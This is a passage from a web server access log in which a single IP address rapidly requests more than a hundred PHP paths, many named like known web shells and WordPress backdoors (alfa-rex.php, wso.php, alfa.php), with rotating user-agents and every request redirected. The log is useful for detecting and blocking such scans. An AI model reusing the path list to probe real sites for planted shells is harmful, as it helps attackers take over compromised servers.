Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:08 +0700] "GET /controller/extension/extension/Not_Found.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:09 +0700] "GET /plugins/envato-market/inc/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:09 +0700] "GET /includes/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:44:10 +0700] "GET /pki-validation/user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:10 +0700] "GET /css/colors/modern/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:10 +0700] "GET /phpmailer/updates.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:11 +0700] "GET /fonts/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:44:11 +0700] "GET /uploads/hrtp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:44:11 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:12 +0700] "GET /includes/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:12 +0700] "GET /css/colors/coffee/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:13 +0700] "GET /class-IXR-decryption.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:13 +0700] "GET /SimplePie/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:44:13 +0700] "GET /pki-validation/xl2023.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:14 +0700] "GET /phpunit/phpunit/src/Util/PHP/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:14 +0700] "GET /plugins/gucdbuwrso/wp-editor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:15 +0700] "GET /wp-mail.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:15 +0700] "GET /plugin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:15 +0700] "GET /SimplePie/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:16 +0700] "GET /css/colors/blue/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:16 +0700] "GET /uploads/eorr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:17 +0700] "GET /maint/update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:17 +0700] "GET /plugins/seoo/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:18 +0700] "GET /themes/twentytwentytwo/moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:18 +0700] "GET /themes/themes/Cyb3r.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:19 +0700] "GET /plugins/fix/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:19 +0700] "GET /customize/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:19 +0700] "GET /plugins/stats/instoll.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:20 +0700] "GET /informasi/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:20 +0700] "GET /pomo/pomo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:21 +0700] "GET /random_compat/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:21 +0700] "GET /wp-content/plugins/xltavrat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:21 +0700] "GET /images/b.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:22 +0700] "GET /random_compat/random-ajax-response.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:22 +0700] "GET /pki-validation/dbform.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:22 +0700] "GET /database.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:23 +0700] "GET /css/3e.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:23 +0700] "GET /maint/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:23 +0700] "GET /x/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:44:24 +0700] "GET /plugins/ubh/2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:24 +0700] "GET /uploads/Simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:24 +0700] "GET /network/mariju.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:44:25 +0700] "GET /plugins/fix/xxx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:25 +0700] "GET /css/dist/block-directory/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 192.145.125.92 - - [23/Sep/2024:02:44:26 +0700] "GET /js/tinymce/skins/wordpress/images/options-permalinks.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:26 +0700] "GET /plugins/apikey/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:27 +0700] "GET /js/js.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:27 +0700] "GET /customize/dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:27 +0700] "GET /areziohe.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:28 +0700] "GET /pki-validation/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:28 +0700] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:44:29 +0700] "GET /include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:29 +0700] "GET /option.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:30 +0700] "GET /plugins/random/init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:44:30 +0700] "GET /images/adminfuns.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:30 +0700] "GET /plugins/akismet/views/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:31 +0700] "GET /SimplePie/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:44:31 +0700] "GET /wp-content/uploads/Piens-ma.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:44:32 +0700] "GET /wp-configs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:32 +0700] "GET /options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:33 +0700] "GET /wp-add.php?a=c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:33 +0700] "GET /themes/fitnessbase/404.php?ok HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:34 +0700] "GET /pki-validation/cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:44:34 +0700] "GET /includes/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:44:34 +0700] "GET /plugins/ccx/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:44:35 +0700] "GET /goat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:35 +0700] "GET /admin-bar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:35 +0700] "GET /plugins/masterslider/inc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:36 +0700] "GET /upgrade/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:36 +0700] "GET /uploads/2023/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:36 +0700] "GET /class-wp-filesystem-base.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:44:37 +0700] "GET /uploads/2023/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:37 +0700] "GET /plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:37 +0700] "GET /images/file1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:44:38 +0700] "GET /images/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:38 +0700] "GET /Text/Diff/Engine/blurbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:38 +0700] "GET /wp-includes/IXR/allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:39 +0700] "GET /customize/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:39 +0700] "GET /js/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:39 +0700] "GET /access.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:44:40 +0700] "GET /css/colors/blue/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:40 +0700] "GET /images/cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:40 +0700] "GET /lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:44:41 +0700] "GET /css/dist/nux/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:41 +0700] "GET /Requests/Auth/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:42 +0700] "GET /theme-compat/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:42 +0700] "GET /theme-compat/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:42 +0700] "GET /plugins/seoo/ulc2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:43 +0700] "GET /uploads/2023/07/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:43 +0700] "GET /acme-challenge/ajax-restore.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:44 +0700] "GET /includes/class-wp-filesystem-import.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:44 +0700] "GET /SimplePie/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:45 +0700] "GET /ms-media.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:45 +0700] "GET /css/searchq.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:46 +0700] "GET /uploads/2023/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:46 +0700] "GET /alfacgiapi/alfa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:44:47 +0700] "GET /ID3/wp-includes/ID3/getid3.lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:47 +0700] "GET /css/colors/ocean/lock0360.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:47 +0700] "GET /assets/mpvloi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:48 +0700] "GET /random_compat/random_bytes_cyclone.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:48 +0700] "GET /plugins/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:48 +0700] "GET /js/tinymce/skins/wordpress/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:49 +0700] "GET /jp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:49 +0700] "GET /plugins/ubh/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:49 +0700] "GET /images/wp-signup.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:50 +0700] "GET /plugins/wp-help/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:50 +0700] "GET /pki-validation/cuopbnal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 192.145.125.92 - - [23/Sep/2024:02:44:50 +0700] "GET /adminer.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:51 +0700] "GET /themes/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:51 +0700] "GET /js/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:52 +0700] "GET /uplirtba.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 192.145.125.92 - - [23/Sep/2024:02:44:52 +0700] "GET /pki-validation/admin1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:53 +0700] "GET /addPhoto.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:53 +0700] "GET /plugins/all-in-one-wp-migration/lib/controller/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 